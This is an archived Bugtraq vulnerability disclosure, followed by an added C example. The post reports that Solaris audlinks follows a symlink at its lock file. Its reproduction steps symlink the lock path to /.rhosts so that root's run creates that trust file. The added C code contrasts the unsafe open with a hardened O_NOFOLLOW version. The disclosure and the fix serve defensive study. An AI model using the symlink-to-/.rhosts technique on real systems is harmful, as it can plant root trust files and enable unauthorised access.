Bugtraq mailing list archives
[no subject]
From: "Optyx - Uberhax0r Communications"@SECURITYFOCUS.COM
Date: Thu, 28 Dec 2000 14:34:50 -0800
/usr/sbin/audlinks has the following behavior:

    $ id
    uid=100(optyx) gid=1(other)
    $ mkdir -p /tmp/b/dev
    $ ln -s /.rhosts /tmp/b/dev/.devfsadm_dev.lock
    $ su root
    Password:
    # /usr/sbin/audlinks -r /tmp/b
    # ls -l /.rhosts
    -rw-r--r-- 1 root other 4 Dec 28 14:28 /.rhosts

truss output snippet:

    open("/dev/.devfsadm_dev.lock", O_RDWR|O_CREAT, 0644) = 4

this is similar to the /usr/sbin/patchadd file clobbering "vulnerability" (not really a vulnerability as a user has to set the link then root has to run the program, but)

-Optyx, Uberhax0r Communications
http://www.uberhax0r.net
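An added example, not part of the original post and not Solaris code: the open() flags from the truss line follow a symlink at the lock path and create its target, while adding O_NOFOLLOW plus an fstat() check refuses it. The function names and the temporary-directory layout are assumptions made for the demonstration.

```c
#define _XOPEN_SOURCE 700   /* mkdtemp, symlink, O_NOFOLLOW */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hardened open for a lock file in a directory other users may control:
 * refuse a symlink as the final path component and accept only a regular
 * file with one link. Parent directories are not checked. Returns fd or -1. */
int open_lock_safely(const char *path)
{
    struct stat st;
    int fd = open(path, O_RDWR | O_CREAT | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;                      /* ELOOP if path is a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: <tmpdir>/lock is a symlink to <tmpdir>/target.
 * Returns 1 if the open created the link target, 0 if not, -1 on error. */
int target_clobbered(int hardened)
{
    char dir[] = "/tmp/lockdemoXXXXXX", lock[64], target[64];
    int fd, made;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(lock, sizeof lock, "%s/lock", dir);
    snprintf(target, sizeof target, "%s/target", dir);
    if (symlink(target, lock) != 0)
        return -1;
    fd = hardened ? open_lock_safely(lock)
                  : open(lock, O_RDWR | O_CREAT, 0644); /* flags as in truss */
    if (fd >= 0)
        close(fd);
    made = (access(target, F_OK) == 0);
    unlink(target); unlink(lock); rmdir(dir);
    return made;
}

int main(void)
{
    printf("plain: %d, hardened: %d\n", target_clobbered(0), target_clobbered(1));
    return 0;
}
```

O_NOFOLLOW covers only the last path component, so a tool run with an alternate root such as -r still has to treat every directory under that root as untrusted.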